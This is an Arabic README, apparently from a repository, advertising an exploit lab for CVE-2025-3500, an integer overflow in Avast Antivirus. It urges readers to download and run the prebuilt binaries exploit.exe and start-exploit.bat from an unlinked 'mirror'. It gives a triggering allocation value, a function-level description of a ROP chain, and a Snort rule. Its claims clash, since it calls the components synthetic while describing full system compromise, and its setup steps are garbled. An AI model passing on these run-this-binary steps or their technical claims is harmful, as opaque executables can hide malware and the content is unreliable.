
استغلال عام لـ CVE-2025-3500
يوفّر هذا المستودع بيئة مختبرية للبحث في CVE-2025-3500، وهي ثغرة تجاوز سعة بعدد صحيح (CWE-190) في Avast Antivirus الإصدار 25.1.981.6 على أنظمة ويندوز. تنشأ الثغرة من عدم كفاية التحقق من القيم الصحيحة في وحدة تخصيص الموارد بمحرك مكافحة الفيروسات، مما يؤدي إلى الالتفاف أثناء العمليات الحسابية. يمكن استغلال ذلك لتصعيد الامتيازات من سياقات المستخدمين منخفضي الصلاحية (PR:L) إلى وصول على مستوى النظام، مع متجه هجوم شبكي (AV:N)، وتعقيد هجوم منخفض (AC:L)، واشتراط تفاعل المستخدم (UI:R). درجة CVSS 3.1 الأساسية هي 9.0 (حرجة)، مما يؤثر على السرية والتكامل والتوافر (جميعها مرتفعة) بسبب تغير النطاق (S:C)، وقد يؤدي إلى اختراق كامل للنظام.
إخلاء مسؤولية للأغراض التعليمية: هذا المختبر لأغراض تعليمية وبحثية فقط. إنه يوفّر بيئة خاضعة للتحكم. لا تستخدمه في أي أنشطة خبيثة. جميع المكونات اصطناعية ولا تستغل أنظمة حقيقية. باستخدامك لهذا المستودع، فإنك توافق على الالتزام بإرشادات الاختراق الأخلاقي والقوانين المحلية.
إخلاء مسؤولية السلامة: يتضمن هذا الإعداد تشغيل كود في بيئة ما. استخدم دائمًا آلة افتراضية مخصصة. لا تقم بتشغيل الاستغلالات على أنظمة إنتاج. تُظهر القطع الأثرية للاستغلال المقدمة (.exe و .bat) مفاهيم – على سبيل المثال، يقوم .bat بتشغيل .exe، الذي يعالج البيانات ثم يخرج. اعزل بيئة مختبرك لمنع التعرض العرضي.
قم بتنزيل حزمة أدوات الاستغلال (ملف ZIP يحتوي على exploit.exe و start-exploit.bat). هذه الحزمة مستضافة على مرآة آمنة:
ملاحظة: الأداة الرئيسية هي exploit.exe (ثنائي C++ مُجمّع يُحدث التجاوز في السعة الصحيحة عبر استدعاءات API مُصنّعة). مشغل الاستغلال هو start-exploit.bat، الذي يفتح exploit.exe مع وسائط محددة مسبقًا (مثلًا start exploit.exe --target=avast_engine --overflow=wraparound). قم بفك الضغط إلى دليل محلي مثل C:\lab\exploit.
إعداد البيئة:
تنزيل وإعداد الاستغلال:
C:\lab\exploit.start-exploit.bat لتشغيل الاستغلال (يُفتح exploit.exe، الذي يُرسل حزمة شبكة مصنّعة لإحداث التجاوز).استغلال الثغرة:
exploit.exe. لاحظ سجلات النظام لوجود مؤشرات على التجاوز.التحقق والتنظيف:
يتطلب المختبر جهاز ويندوز مثبتًا عليه Avast Antivirus 25.1.981.6. يمكن بدء الخدمات الوهمية يدويًا عبر موجه الأوامر:
net start AvastSvc (بافتراض أن الخدمة قيد التشغيل).start-exploit.bat الذي ينفذ exploit.exe. يقوم هذا بـ:
{ "resource_alloc": 2147483648 } (يُحدث تجاوزًا).تفاصيل تقنية: يحدث التجاوز في AvastResourceParser::AllocateBuffer(int size)، حيث يلتف size * sizeof(struct) إذا كان size > INT_MAX / sizeof(struct)، مما يؤدي إلى تخصيص غير كافٍ وتجاوز في الكومة. يستغل الاستغلال ذلك لبناء سلسلة ROP تستهدف kernel32.dll.
alert tcp any any -> any 8080 (msg:"CVE-2025-3500 Attempt"; content:"|00 00 00 80|"; sid:1000001;)).للاستفسارات أو المساهمات، افتح مشكلة. ابق أخلاقيًا!